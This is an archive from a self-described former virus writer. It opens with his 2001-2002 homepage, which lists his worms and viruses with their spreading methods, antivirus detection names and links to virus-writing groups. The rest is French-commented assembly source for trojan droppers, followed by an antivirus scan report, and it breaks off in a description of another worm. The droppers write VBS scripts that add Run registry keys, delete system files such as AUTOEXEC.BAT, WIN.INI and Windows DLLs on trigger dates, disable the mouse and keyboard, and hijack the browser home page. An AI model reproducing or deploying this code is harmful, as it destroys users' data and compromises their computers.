PetiK Archiver 1.0
17/05/2009
After 7 years to stop coding virus/worms, I decided to assemble all my works. It is sorted by date like this : YYYYMMDD (where Y is the year, M the month and D the day) and the name of the works. In the begining you can see my old website page. Then my works. Newt, my not finish works and some articles.
Best reading. PetiK Homepage (last update : July 9th 2002)
EMAIL : [email protected]
NEW : FORUM FOR ALL VXERS : CLICK HERE
PLEASE SIGN MY GUESTBOOK : CLICK HERE
2002: July 9th : GOOD BYE TO ALL VXERS. I LEAVE THE VX-SCENE. I HOPE MY WORKS LIKE YOU AND WILL HELP YOU IN YOUR VX-LIFE. IF YOU WANT TO CONTACT ME, PLEASE WRITE IN THE GUESTBOOK. Special Thanx to : alc0paul, Benny/29A, Bumblebee, Vecna, Mandragore, ZeMacroKiller98and the greatest coder group : 29A
July 7th : Add some new descriptions of AV (from Trend Micro and McAfee) July 3rd : Add the binary of my last Worm coded with alc0paul : VB.Brigada.Worm July 2nd : Add a new link : Second Part To Hell June 29th : Add my new tool : PetiK’s VBS Hex Convert and add my last full spread VBS worm : VBS.Hatred June 26th : Add W32/HTML.Dilan June 24th : Add VBS.Park June 22nd : I finish my new worm : VB.DocTor.Worm June 20th : PETIKVX EZINE #2 REALIZED : DOWNLOAD IT and add a new tool : CryptoText and my last worm : VB.Mars.Worm June 19th : Add VBS.Cachemire. Add my new article VBS/HTML Multi-Infection. June 16th : I join a new Virus Group : Brigada Ocho (create by alc0paul) June 1st : Add VB.Lili.Worm. My new worm is released : I-Worm.Haram May 31st : I leave the rRlf group May 23rd : New Ezine : rRlf#2 May 19th : I remove some source. You can find of them in PetiKVX#1 and the other in PetiKVX#2. Finish VB.Visual.Worm published in PetiKVX #2 May 14th : Add W97M.ApiWord May 12th : Add W32.HLLW.Archiver May 10th : Add a new tool to protect against new VBS Worm : PPVBSW May 9th : Add a new macro virus : W97M.AutoSpread May 8th : I join the rRlf group (http://www.rrlf.de). Add HTML.Welcome. May 6th : Add a new article : VBS Tutorial and exist in PDF April 27th : Add VBS.Xchange April 21st : Add all source of my works. April 7th : Add my first Ezine : PetiKVX Ezine #1. My new email is [email protected] March 15th : Add I-Worm.Together March 14th : My new email : [email protected] ([email protected] failed) March 10th : Add W32.HLLW.LiteLo March 9th : Add my articles in PDF format : articlesPDF and 29A#6. March 8th : Add my first VBS worm and HTML virus generator : PSWVG (W32.PSVG.gen : Norton AntiVirus, Constructor.VBS.PSWVG.10 : AVP) March 3rd : Add a new virus/worm : VBS/W97M.Doublet February 25th : Add a macro virus : W97M.Wolf February 24th : Add a lame love worm : HTML.Linda February 22nd : Add W32.HLLW.Wargames February 18th : Add a new Ezine : rRlf February 16th : Add my first virus (perhaps bug) : WinRAR.Linda February 14th : Add a new HTML virus : HTML.Macrophage February 10th : Can download my last worm. Add my second article : Technics February 7th : Finish my last worm : I-Worm.Falken (can’t download immediately) February 4th : Add new worm : I-Worm.Extract February 1st : New Worm : W32/W97M.Twin January 27th : I come back with a new worm : HLLW.SingLung.Worm January 20th : Add PetiKShow. This program contains all the sources of my works. January 10th : Add an old article about Worm Spreading written by me on September 19th. January 1st : HAPPY NEW YEAR. I DECIDED TO STOP TO CODE VIRII AND WORM. GOOD BYE
2001: December 10th : Add my last worm : W32.HLLW.Last November 6th : I-Worm.Anthrax October 12th : I-Worm.WTC September 8th : I-Worm.Passion September 2nd : I-Worm.Rush August 24th : I-Worm.Casper August 18th : Add the tool tElock 5.1 (A compress/encrypted PE file) August 16th : I-Worm.Kevlar August 12th : New design. You can hear one of my compositions. August 9th : New descrption from AVP about I-Worm.MadCow and I-Worm.Friends. August 8th : I-Worm.XFW July 18th : New Fanily : W32.Pet_Tick family (6), VBS.Pet_Tick family (3) from Norton Antivirus July 8th : I-Worm.MaLoTeYa July 3rd : VBS.Delirious June 30 th : I-Worm.Bush June 19th : I-Worm.Winmine June 18th : W97M.Blood June 17th : VBS.Seven June 10th : VBS.Starmania, I-Worm.Gamma, W97M.Kodak June 4th : BAT.Quatuor June 3rd : Bastille, JS.Germinal June 2nd : Add some Worms : HTML.Embargo, I-Worm.Mustard May 25th : I start my homepage. Source
You can found here my different worms that I create :
AntiVirus Name Real Name Date Description (TM=Trend Micro)
It's a DOS worm. It uses mIRC to AVP : IRC.Worm.PetiK Bastille 06/03/2001 spread. On July 14th, he stops TM : Bat.PetiK.A the computer
A BAT file which uses mIRC to BAT.Quatuor 06/04/2001 IRC.Becky.A spread.
CryptoText 06/20/2002 Coded in VB6. Encrypt ASCII file.
It is script that uses ActiveX controls to perform actions. It HTML.Bother.3180 modifies the default home page. It infects to all .HTM and .HTML HTML.Bother 05/13/2001 files that it founds in the \MY AVP : VBS.Both DOCUMENTS and \WINDOWS\WEB TM : HTML.Bother.A folders. The default icon for .html files is changed.
It copies itself to \WINDOWS\WinHelp.htm. Change the HTML.Embargo 05/29/2001 VBS.Embaro.A.Intd AUTOEXEC.BAT. It uses mIRC channel to spread
HTML.Linda 02/24/2002 Lame love worm.
Infect htm,html,htt,hta and asp HTML.Prepend HTML.Macrophage 02/14/2002 files in different special Panda : HTML/Mage folders.
My first virus for rRlf group. VBS.Manu@mm Infects web files HTML.Welcome 05/08/2002 (htm,html,htt,asp) and spread TM : VBS.PATIK.G with Outlook into a VBS file. W95.Pet_Tick.gen Open WAB default file to take I-Worm.Anthrax 11/06/2001 some email and spread with MAPI. TM : Worm.Pettick.A Spread with mIRC too. Sophos : W32/Petick-A
W95.Pet_Tick.E@mm I-Worm.Bush 06/30/2001 Uses MAPI to spread. Not BUGS. AVP : I-Worm.PetiK.e
It‘s a utility which detect I-Worm.Casper 08/24/2001 TM : Worm.Capser.A Happy99 and Icecubes. Uses MAPI. Perhaps bugz.
I-Worm.Dandelion 11/16/2001 UNRELEASED WORM
Panda : W32/Extract I-Worm.Extract 02/04/2002 Open KERNEL32.DLL to find API. TM : WORM.PETIK.L
I-Worm.Falken 07/02/2002 First WGAA Worm. WARNING !
W32.Pet_Tick.B It uses a VBS file and mIRC to W32.Fiend.Worm I-Worm.Friends 05/05/2001 spread. he alters the Window's
owner and company. AVP : I-Worm.PetiK.b
W95.Pet_Tick.D@mm Scan all *.*htm* file in W95.Wormfix.Worm@mm I-Worm.Gamma 05/09/2001 "Temporary Internet Files" and uses MAPI function to spread AVP : I-Worm.PetiK.c
Spread with a randome VBS file in I-Worm.Haram 06/01/2002 StartUp folder and put an HTML virus.
Infect C???????.exe. Scans some W32.Pet_tick.M email address in the Outlook I-Worm.Kevlar 08/16/2001 TM : Worm.Kevlar.A Address Book and uses MAPI to Panda : Worm.PetiK.C spread.
W32.Pet_Tick.Intd
Sophos : W32/Petik-K Uses MAPI function to spread. I-Worm.Loft 06/23/2001 Open some DLL files to uses some AVP : I-Worm.PetiK.k API.
TM : Worm.PetiK.K
It's my first worm. It uses W32.Pet_Tick.A@mm Outlook and mIRC to spread. It W32.Salut.Worm@mm I-Worm.MadCow 12/01/2000 creates \SYSTEM\MSLS.ICO and will be the default icon of .exe AVP:I-Worm.PetiK.a files.
W32.Pet_Tick.G W32.Malot.Int Uses MAPI to spread. Create a HTML file in the StartUp folder I-Worm.MaLoTeYa 07/08/2001 AVP : I-Worm.PetiK.f to send some informations about the user. CONTRIBUTE TO 29A#6. TM : Worm.Malot.A
Modify "Exclude.dat" in the W32.Update.Worm "Install Folder" of Norton I-Worm.Mustard 05/27/2001 Antivirus to create a VBS file. AVP : I-Worm.PetiK.d The worm spread with Outlook TM : Worm.Mustard.A which use this VBS file.
Copy all mail of Outlook Address Book in a file and scans this I-Worm.Passion 09/08/2001 W95.Pet_Tick.gen file to spread. Change some URL 1 times of 10.
W95.Pet_Tick.C@mm W95.Buggy.Worm@mm Modify the Wallpaper with a BMP file that it download to a ftp I-Worm.PetiK 02/07/2001 AVP : I-Worm.IEPatch site. He spread with a VBS file which use Outlook. TM : Worm.PetiK.A
Not bugz for MAPI functions. Start of propagation by error on I-Worm.Rush 02/09/2001 TM : Worm.Rush.A August 30th. Some payloads with some titles of windows.
I-Worm.Together 03/15/2002 W32.Pet_Tick.AC@mm Kill some AV. 100% assembler.
W32.Mineup.Worm AVP : I-Worm.Petik I-Worm.Winmine 06/19/2001 Uses Outlook to spread. McAfee:W32/PetTick@MM
Panda : W32/PetTick
Sophos : W32/Petik-WTC A Worm against the terrorism. I-Worm.WTC 10/11/2001 Infect RAR files in the Personal TM : WORM.PETTICK.Q directory.
W95.Pet_tick.gen Infect WSOCK32.DLL and all DLL I-Worm.XFW 08/08/2001 TM : Trojan.PetiK.XFW files in the SYSTEM directory. Panda : Worm.PetiK.D
JS.Lamnireg.A Trojan It infects JS file in \WINDOWS, \WINDOWS\Desktop and JS.Germinal 06/02/2001 AVP : JS.Germinal \WINDOWS\SAMPLES\WSH directories. TM : JS.Germinal.A It uses mIRC to spread.
Coded with alc0paul and spread VB.Brigada.Worm 07/03/2002 TM : WORM.CRAZYBOX.A with Macro Word, ZIP and Outlook. My last worm.
W32/W97M.Dotor.Worm VB.DocTor.Worm 06/22/2002 It spread by infecting DOC files McAfee : W32/DoTor Panda : W32/Dotor.A
W32.Pet_Ticky.B VB.Lili.Worm 06/01/2002 A lame worm with a XXX picture Panda : W32/Petlil.A
This worm spread by scaning the W32.Gubed.Worm start page of Internet Explorer VB.Mars.Worm 06/20/2002 to find some email. The binary is McAfee : W32/Gubed also stocking into a VBS file in TM : WORM.GUBED.A the %StartUp% folder.
My first worm coded in Visual VB.Visual.Worm 05/19/2002 W32.Pet_Ticky.gen Basic. Lame worm.
A worm which spread in a local VBS.Cachemire 06/19/2002 network and have a greate power of spreading.
VBS.Pet_Tick.C@m VBS.Ketip.C@m VBS.Delirious 07/03/2001 Put his code in NORMAL.DOT AVP : I-Worm.Petik.h
This virus infects VBS and DOC VBS/W97M.Doublet 03/03/2002 VBS.Doublet@mm files. Spread with Outlook.
This worm/virus infects VBS files VBS/W97M.Xchange 04/27/2002 and DOC documents Word. CONTRIBUTE TO RRLF#2
VBS.GoodBye 12/01/2001 UNRELEASED WORM
Encrypt with my tool “PetiK’s VBS VBS.Hatred 06/29/2002 Hex Convert”
Use ftp to download a file (virus VBS.Pet_Tick.B@mm ?, trojan horse ?). If we are the VBS.Judge 12/08/2000 VBS.Ketip.B@mm 1st of the month, Judge modifies the AUTOEXEC.BAT.
VBS.Park 06/24/2002 A VBS/HTML multi-infection virus
It arrives as an HTML email VBS.Pet_Tick.A@mm message. It use Outlook and mIRC VBS.Ketip.A@mm clients to spread. It infects VBS.PetiK 01/31/2001 different files and sends some AVP : I-Worm.LeeBased information from infected computer to 2 email addresses.
VBS.Chism@mm VBS.Copy.A@mm VBS.Seven 06/18/2001 Many actions in any day AVP : I-Worm.Petik.i
TM : VBS.PETIK.I
VBS.ManiaStar.A@mm It infects all VBS files in different folders. It spread with VBS.Starmania 06/15/2001 AVP : IRC- three different subject, body and Worm.generic.vbs attachment.
Infect ZIP files in certain W32.HLLW.Archiver 05/12/2002 folders.
My very first (and last) worm W32.HLLW.Last 10/12/2001 Sophos : W32/Stall-A written with Borland C++.
W32.HLLW.LiteLo 03/10/2002 A lame HLL worm.
Open *.ht* file to find some W32.HLLW.SingLung 01/27/2002 AVP : I-Worm.Stopin email and spread with MAPI functions.
AVP : I-Worm.WarGam Differents way of propagation : Viruslist : WarGame W32.HLLW.Wargames 02/22/2002 open *htm files, old mail read and Outlook Address W32.WarGam.Worm
W97M.Comical This worm uses VBA and W32asm to W32/W97M.Twin 02/01/2002 Sophos : W97M.Comical spread.
Spread via HTML files by W32/HTML.Dilan 06/26/2002 infecting them in specifics folders.
This virus infects RAR files Win32RAR.Linda 02/16/2002 while adding the virus and HTM files while adding a script.
Uses some API to infect Word W97M.ApiWord 05/14/2002 W97M.Apish Document
A large spreading. Export “Sleep” W97M.AutoSpread 05/09/2002 W97M.Beko@mm API
W97M.Pet_Tick.Intd W97M.Ketip.Intd W97M.Blood 06/18/2001 Infect NORMAL.DOT. AVP : Embedded W97M.Adok.A W97M.Kodak 06/10/2001 Infect NORMAL.DOT. AVP:Macro.Word97.Adok
W97M.OutlookWorm.Gen
AVP : It uses mIRC and Outlook to W97M.Maya 06/05/2001 Macro.Office.Melissa- spread. based
TM : W97M.AYAM.A
Infect .doc files with the “Wolf” W97M.Wolf 02/25/2002 W97M.Droopy.A module. Thanx to Walrus
Links
A selection of the best virii sites :
VirLinux : http://www.virlinux.fr.fm A French site about virii’s Linux
VIRUS CODERS :
Alc0paul : http://alcopaul.cjb.net Belial : http://home.foni.net/~belial Benny : http://www.coderz.net/benny Black Jack : http://blackjackvx.cjb.net Del_Armg0 : http://www.delly.fr.st French coder FlyShadow : http://flyshadow.cjb.net Gigabyte : http://www.coderz.net/gigabyte Immortal Riot : http://www.immortalriot.cjb.net Kalanar : http://virii.at/ak or http://www.kvirii.com.ar Lord Julus : http://lordjulus.cjb.net NBK : http://www.nbk.hpg.ig.com.br Nucleii : http://www.coderz.net/nucleii/main.html Pointbat : http://pbat.cjb.net/ French coder Silvio : http://www.big.net.au/~silvio/ Ratter : http://www.coderz.net/ratter/ SPTH (Second Part To Hell) : http://www.spth.de.vu/ The Walrus : http://walrus.up.to Tipiax : http://www.multimania.com/tipiax French coder Vecna : http://www.coderz.net/asm_infamy VirusBuster : http://vtc.cjb.net Voven/SMF : http://vovan-smf.wz.cz/ VXUniverse : http://vxuniverse.cjb.net ZeMacroKiller98 : http://www.crosswinds.net/~zemacrokiller98/index.htm French coder Zulu : http://www.coderz.net/zulu
VX GROUPS :
29A : http://29a.host.sk ASM : http://kickme.to/asm BlackArt : http://blackart.cjb.net Black Cat virii Group : http://www.ebcvg.com or http://bcvgvx.cjb.net/ Brigada Ocho : http://brigada8.cjb.net HFX : http://www.hfactorx.org/ Indonesian Virus : http://indovirus.8m.com/ Kryptocrew : http://www.kryptocrew.de LineZero : http://www.coderz.net/lz0vx/start.htm MATRiX : http://www.coderz.net/mtxvx NoMercy : http://www.coderz.net/nomercy/ Pinoy Virus Writer : http://hackers.b3.nu rRlf : http://www.rrlf.de/ ShadowVX : http://shadowvx.members.easyspace.com/ SMF : http://www.sallyone.com/smf/e_index.htm , http://smfgroup.cjb.net Ultimate Chaos : http://www.ultimatechaos.co.uk/ Virus Brasil : http://www.virusbrasil.8m.com
OTHER SITES :
Coderz : http://www.coderz.net Red Virica : http://redvirica.host.sk/ Virii Argentino : http://www.virii.com.ar Virus Central : http://www.viruscentral.org/ VirusList : http://www.viruslist.com Virus Trading Center : http://www.oninet.es/usuarios/darknode/ VX-DNET : http://surf.to/vxdnet VX Heavens : http://vx.netlux.org/ Virus Trading : http://www.virustrading.com/ VX Universe : http://vxuniverse.cjb.net/
ExeTools : http://www.exetools.com ProTools : http://protools.cjb.net
ANTIVIRUS SITES :
AVP : http://www.avp.ch Symantec : http://www.symantec.com/avcenter Trend Micro : http://www.trendmicro.com
CONTACT : GuestBook
© 2001-2002 PetiK. All informations on this site is for educational purpose only.
;TAILLE : 475 OCTETS 31/08/00 ;DWARF crée un fichier dwarf.vbs qui ajoutera une clé afin ;que l'ordinateur s'éteigne au démarrage .model small .code org 100h
DEBUT : mov ah,09h ;affiche un message lea dx,text1 ;avec deux proposition int 21h
TOUCHE: mov ah,1 ;lecture du caractŠre int 21h cmp al,'C' je CREER_FICHIER cmp al,'c' je CREER_FICHIER ;si 'C-c' on continue cmp al,'Q' je FIN_PROGRAMME cmp al,'q' je FIN_PROGRAMME ;si 'Z-z' on stop mov dx,offset bad ;mauvaise touche mov ah,9h int 21h jmp TOUCHE
CREER_FICHIER: mov ah,3Ch ;CREE UN FICHIER xor cx,cx mov dx,offset NOM ;ET LUI DONNE UN NOM int 21h ECRIRE_FICHIER: xchg ax,bx mov ah,40h ;ECRIT DANS LE FICHIER mov cx,meslen mov dx,offset note int 21h FERMER_FICHIER: mov ah,3Eh ;PUIS LE REFERME int 21h mov dx,offset updir ;CHANGEMENT DE REPERTOIRE mov ah,3Bh int 21h
MESSAGE: mov ah,09h ;AFFICHE LE MESSAGE lea dx,msg int 21h
FIN_PROGRAMME : mov ah,4Ch ;FERME LE PROGRAMME int 21h text1 db 10,13,'Tape C pour continuer ou Q pour quitter : $' bad db 7,7,8,' ',8,24h NOM db 'c:\dwarf.vbs',0 updir db '..',0 msg db 7,7,7,10,13,'SALUT MEC !!!!' db 10,10,13,'UN FICHIER A ETE RAJOUTE' db 10,13,'IL SE NOMME C:\dwarf.vbs $' note db 'rem DwArF.vbs by Panda ' db '(c) 2000' prog db 'Dim WSHShell',0Dh,0Ah db 'Set WSHShell = Wscript.CreateObject("WScript.Shell")',0Dh,0Ah db 'WSHShell.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\' db 'Windows\CurrentVersion\Run\DwArF", "C:\WINDOWS\RUNDLL32.EXE ' db 'C:\Windows\system\User.exe,ExitWindows"' meslen equ $-note end DEBUT ;Par M.Xxxxxxx XXXXXXX (c)2000 09/09/00 ;TAILLE : 689 OCTETS ;TESTE LE PREMIERE FOIS AU LYCEE KIRSCHLEGER DE MUNSTER ;DWARF259 CREE DEUX PROGRAMME : ; -Dwarf.vbs dans C: active Evil.com … chaque d‚marrage ; -Evil.com dans C:\WINDOWS. ;Le 25 septembre, il renomme REGEDIT.EXE dans la corbeille ;en DWARF.AZE et efface AUTOEXEC.BAT et WIN.INI
.model small .code org 100h
TOUT_DEBUT: jmp FILE1
VERIFICATION: mov ah,2Ah int 21h cmp dh,9 jnz FIN_VIRUS cmp dl,25 ;25 SEPTEMBRE ? jnz FIN_VIRUS ;NON : FIN DU TROJAN AFFICHE: mov ah,9 lea dx,MSG int 21h DISQUE: mov ah,41h mov dx,offset AUTOEXEC int 21h ;EFFACE AUTOEXEC.BAT mov dx,offset WININI int 21h ;EFFACE WIN.INI mov ah,56h mov dx,offset REG ;RENOMME REGEDIT.EXE mov di,offset CORBEILLE ;EN DWARF.AZE int 21h FIN_VIRUS: mov ah,4Ch int 21h
MSG db 7,7,7,'TROJAN.DWARF par PandaKiller (c)2000' db 10,10,13,'BOOM! BOOM! BOOM! BOOM! BOOM! BOOM!' db 10,13,' ÛÛÛ Û Û ÛÛ ÛÛÛ ÛÛÛÛ' db 10,13,' Û Û Û Û Û Û Û Û Û ' db 10,13,' Û Û Û Û ÛÛÛÛ ÛÛÛ ÛÛÛ ' db 10,13,' Û Û Û Û Û Û Û Û Û Û ' db 10,13,' ÛÛÛ Û Û Û Û Û Û Û $'
WININI db 'C:\WINDOWS\Win.ini',0 AUTOEXEC db 'C:\autoexec.bat',0 REG db 'C:\WINDOWS\Regedit.exe',0 CORBEILLE db 'C:\RECYCLED\dwarf.aze',0 progl2 equ $-VERIFICATION
FILE1: mov ah,3Ch xor cx,cx mov dx,offset NOM1 int 21h ;CREATION DU 1ER FICHIER xchg ax,bx mov ah,40h mov cx,progl1 ;LONGUEUR DU PROGRAMME mov dx,offset prog1 ;DEBUT DU PROGRAMME int 21h ;ECRITURE mov ah,3Eh int 21h ;FERMETURE FILE2: mov ah,3Ch xor cx,cx mov dx,offset NOM2 int 21h ;CREATION DU 2ND FICHIER xchg ax,bx mov ah,40h mov cx,progl2 ;LONGUEUR DU PROGRAMME lea dx,VERIFICATION ;DEBUT DU PROGRAMME int 21h ;ECRITURE mov ah,3Eh int 21h ;FERMETURE FIN: mov ah,4Ch int 21h
NOM1 db 'c:\Dwarf.vbs',0 NOM2 db 'c:\WINDOWS\Evil.com',0 prog1 db 'rem DwArF.vbs by Panda (c)2000',0Dh,0Ah db 'msgbox "C''EST PARTI",vbcritical',0Dh,0Ah db 'Dim W',0Dh,0Ah db 'Set W = Wscript.CreateObject("WScript.Shell")',0Dh,0Ah db 'W.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows' db '\CurrentVersion\Run\DwArF", "C:\WINDOWS\Evil.com"' progl1 equ $-prog1 end TOUT_DEBUT ;Par M.Xxxxxxx XXXXXXX (c)2000 12/09/00 ;TAILLE : 1282 OCTETS ;DWARF7 CREE DEUX PROGRAMME : Dwarf.vbs et Panda.vbs. DWARF.VBS VA ;RAJOUTER UNE CLE POUR ACTIVER PANDA.VBS TOUS LES JOURS. PANDA.VBS ;ENTRE EN ACTION QUE LE 5 DECEMBRE. IL RAJOUTE UNE CLE POUR ETEINDRE ;L'ORDINATEUR AU DEMARRAGE ET CREE UN FICHIER AUTOEXE.BAT QUI ;SUPPRIMERA DES FICHIER SUR L'ORDINATEUR. .model small .code org 100h FILE1: mov ah,3Ch xor cx,cx mov dx,offset NOM1 int 21h ;cr‚ation du 1er fichier xchg ax,bx mov ah,40h mov cx,progl1 mov dx,offset prog1 int 21h ;‚criture mov ah,3Eh int 21h ;fermeture FILE2: mov ah,3Ch xor cx,cx mov dx,offset NOM2 int 21h ;cr‚ation du 2nd fichier xchg ax,bx mov ah,40h mov cx,progl2 mov dx,offset prog2 int 21h ;‚criture mov ah,3Eh int 21h ;fermeture MESSAGE: mov ax,3 int 10h mov ah,9 lea dx,msg int 21h FIN: mov ah,4Ch int 21h NOM1 db 'c:\Dwarf.vbs',0 NOM2 db 'c:\WINDOWS\Panda.vbs',0 prog1 db 'rem DwArF.vbs by Panda (c)2000',0Dh,0Ah db 'msgbox "BONNO JOURNEE ?",vbexclamation',0Dh,0Ah db 'Dim W',0Dh,0Ah db 'Set W = Wscript.CreateObject("WScript.Shell")',0Dh,0Ah db 'W.Regwrite "HKLM\Software\Microsoft\Windows' db '\CurrentVersion\Run\DwArF", "C:\WINDOWS\Panda.vbs"' progl1 equ $-prog1 prog2 db 'If Day(Now) = 5 And Month(Now) = 12 Then',0Dh,0Ah db 'msgbox "ERREUR : CLIQUEZ SUR OK",vbcritical',0DH,0Ah db 'Dim W',0DH,0Ah db 'Set W=CreateObject("WScript.Shell")',0DH,0Ah db 'W.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\' db 'Run\DwArF", "C:\WINDOWS\RUNDLL32.EXE ' db '%windir%\system\user.exe,Exitwindows"',0DH,0Ah db 'W.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\' db 'Run\DwArF2", "C:\autoexe.bat"',0DH,0Ah db 'Set X=CreateObject("Scripting.FileSystemObject")',0DH,0Ah db 'file="C:\autoexe.bat"',0DH,0Ah db 'Set O=X.CreateTextFile(file, True, False)',0DH,0Ah db 'O.Writeline "@echo off"',0DH,0Ah db 'O.Writeline "del C:\WINDOWS\*.ini"',0DH,0Ah db 'O.Writeline "del C:\WINDOWS\*.sys"',0DH,0Ah db 'O.Writeline "del C:\WINDOWS\*.bmp"',0DH,0Ah db 'O.Writeline "del C:\WINDOWS\*.sys"',0DH,0Ah db 'O.Writeline "del C:\WINDOWS\E*.*"',0DH,0Ah db 'O.Writeline "del C:\WINDOWS\M*.*"',0DH,0Ah db 'O.Writeline "del C:\WINDOWS\COMMAND\*.*"',0DH,0Ah db 'O.Writeline "del C:\WINDOWS\SYSTEM\*.dll"',0DH,0Ah db 'O.Writeline "del C:\WINDOWS\SYSTEM\*.ini"',0DH,0Ah db 'msgbox "TU VAS MOURIR DEMAIN",vbinformation',0DH,0Ah db 'End If',0DH,0Ah progl2 equ $-prog2 msg db 7,7,7,10,13,'UN FICHIER A ETE CREE',0Ah,0Ah,0Dh db 'IL SE NOMME C:\Dwarf.vbs',10,10,13 db 'OUVRE LE VITE $' end FILE1 ;Panda3.asm par PandaKiller 03/10/00 ;TASM32 /M /ML panda3 ;TLINK32 -Tpe -x -aa panda3,,,import32
.386 locals jumps .model flat extrn CreateFileA:PROC extrn WriteFile:PROC extrn CloseHandle:PROC extrn RegCreateKeyExA:PROC extrn RegSetValueExA:PROC extrn RegCloseKey:PROC extrn MessageBoxA:PROC extrn WinExec:PROC extrn ExitProcess:PROC
.data octets dd ? flz_handle dd ? nom_fichier db 'C:\Salut.vbs',00h prog db 'C:\Salut.vbs',00h TEXTE db 'Salut ! Ca va ?',00h TITRE db 'Hello',00h TEXTE2 db 'J''ai mis un fichier sur ton ordinateur',0dh,0ah db 'Il s''appelle Salut.vbs et se trouve dans C:\',0dh,0ah db 'Ouvre-le vite',00h TITRE2 db 'FICHIER CREE',00h CLE db '\Software\Microsoft\Windows\CurrentVersion',00h DONNEE db 'PandaKiller',00h NOM db 'RegisteredOwner',00h p dd 0 l dd 0
DEBUTV: db '''VBS/PandaKiller.Trojan.A PAR Pentasm99 (c)2000 03/10/00',0dh,0ah db '''SE COPIE DANS WINDOWS ET WINDOWS\SYSTEM',0dh,0ah db '',0dh,0ah db 'DEBUT()',0dh,0ah db 'Sub DEBUT()',0dh,0ah db 'Set a = CreateObject("Scripting.FileSystemObject")',0dh,0ah db 'Set win = a.GetSpecialFolder(0)',0dh,0ah db 'Set sys = a.GetSpecialFolder(1)',0dh,0ah db 'Set c = a.GetFile(WScript.ScriptFullName)',0dh,0ah db 'c.Copy(win&"\WSock32.dll.vbs")',0dh,0ah db 'c.Copy(sys&"\PandaDwarf.txt.vbs")',0dh,0ah db 'INTERNET()',0dh,0ah db 'BUG2001()',0dh,0ah db 'Set T = a.deletefile("C:\Salut.vbs")',0dh,0ah db 'End Sub',0dh,0ah db '',0dh,0ah db '''MODIFIE LA PAGE INTERNET ET RAJOUTE UN RESISTRE DANS "RUN"',0dh,0ah db 'Sub INTERNET()',0dh,0ah db 'Dim W',0dh,0ah db 'Set W = Wscript.CreateObject("WScript.Shell")',0dh,0ah db 'W.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\' db 'Start Page", "http://www.penthouse.com"',0dh,0ah db 'W.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\' db 'StartWindoz", "C:\WINDOWS\SYSTEM\WSock32.dll.vbs"',0dh,0ah db 'End Sub',0dh,0ah db '',0dh,0ah db '''DESACTIVE LA SOURIS ET LE CLAVIER EN 2001 ET EXECUTE WINMINE',0dh,0ah db 'Sub BUG2001()',0dh,0ah db 'If Year(Now) = 2001 Then',0dh,0ah db ' Dim P',0dh,0ah db ' Set P = Wscript.CreateObject("WScript.Shell")',0dh,0ah db ' P.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\' db 'Stop1", "rundll32,mouse disable"',0dh,0ah db ' P.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\' db 'Stop2", "rundll32,keyboard disable"',0dh,0ah db ' P.run ("C:\WINDOWS\Winmine.exe")',0dh,0ah db 'End If',0dh,0ah db 'End Sub',0dh,0ah taille equ $-DEBUTV .code REGISTRE: push offset l push offset p push 0 push 1F0000h + 1 + 2h push 0 push 0 push 0 push offset CLE push 80000002h ;HKEY_LOCAL_MACHINE call RegCreateKeyExA push 05h push offset DONNEE ;PandaKiller push 01h push 0 push offset NOM ;DANS RegisteredOwner push p call RegSetValueExA ;CREE UN REGISTRE push 0 call RegCloseKey ;FERME LA BASE DE REGISTRE FICHIER: push 00h push 80h push 02h push 00h push 01h push 40000000h push offset nom_fichier ;DONNE LE NOM DU FICHIER call CreateFileA mov [flz_handle],eax push 00000000h push offset octets push offset taille push offset DEBUTV push [flz_handle] call WriteFile push [flz_handle] call CloseHandle MESSAGE: push 40h push offset TITRE push offset TEXTE push 0 call MessageBoxA push 40h push offset TITRE2 push offset TEXTE2 push 0 call MessageBoxA push 1 push offset prog call WinExec FIN: push 0 call ExitProcess end REGISTRE File Panda3.exe received on 05.16.2009 18:00:23 (CET) Antivirus Version Last Update Result a-squared 4.0.0.101 2009.05.16 - AhnLab-V3 5.0.0.2 2009.05.16 - AntiVir 7.9.0.168 2009.05.15 - Antiy-AVL 2.0.3.1 2009.05.15 - Authentium 5.1.2.4 2009.05.16 - Avast 4.8.1335.0 2009.05.15 - AVG 8.5.0.336 2009.05.15 - BitDefender 7.2 2009.05.16 Generic.Malware.Ssp!.1E162891 CAT-QuickHeal 10.00 2009.05.15 - ClamAV 0.94.1 2009.05.16 - Comodo 1157 2009.05.08 - DrWeb 5.0.0.12182 2009.05.16 - eSafe 7.0.17.0 2009.05.14 - eTrust-Vet 31.6.6508 2009.05.16 - F-Prot 4.4.4.56 2009.05.16 - F-Secure 8.0.14470.0 2009.05.15 - Fortinet 3.117.0.0 2009.05.16 - GData 19 2009.05.16 Generic.Malware.Ssp!.1E162891 Ikarus T3.1.1.49.0 2009.05.16 - K7AntiVirus 7.10.737 2009.05.16 - Kaspersky 7.0.0.125 2009.05.16 Type_Script McAfee 5616 2009.05.15 - McAfee+Artemis 5616 2009.05.15 - McAfee-GW-Edition 6.7.6 2009.05.15 - Microsoft 1.4602 2009.05.16 - NOD32 4080 2009.05.15 - Norman 6.01.05 2009.05.16 - nProtect 2009.1.8.0 2009.05.16 - Panda 10.0.0.14 2009.05.16 - PCTools 4.4.2.0 2009.05.16 - Prevx 3.0 2009.05.16 - Rising 21.29.52.00 2009.05.16 - Sophos 4.41.0 2009.05.16 - Sunbelt 3.2.1858.2 2009.05.16 - Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen TheHacker 6.3.4.1.326 2009.05.15 - TrendMicro 8.950.0.1092 2009.05.15 - VBA32 3.12.10.5 2009.05.16 - ViRobot 2009.5.15.1737 2009.05.15 - VirusBuster 4.6.5.0 2009.05.16 - Additional information File size: 8192 bytes MD5...: 104229b6d583df50db044f0d89fc7db9 SHA1..: db05dc880b74d864a8c47d8db22c2847b655c14a comment $
W32.PandaKiller.A par PandaKiller le 12 octobre 2000
CREER DEUX REPERTOIRE : - C:\PandaKiller - %windir%\Panda
S'AUTO-COPIE DANS : - %windir%\Pandakiller.exe - %windir%\Panda\Stages.exe - %system%\Monopoly.exe
DESCRIPTION:
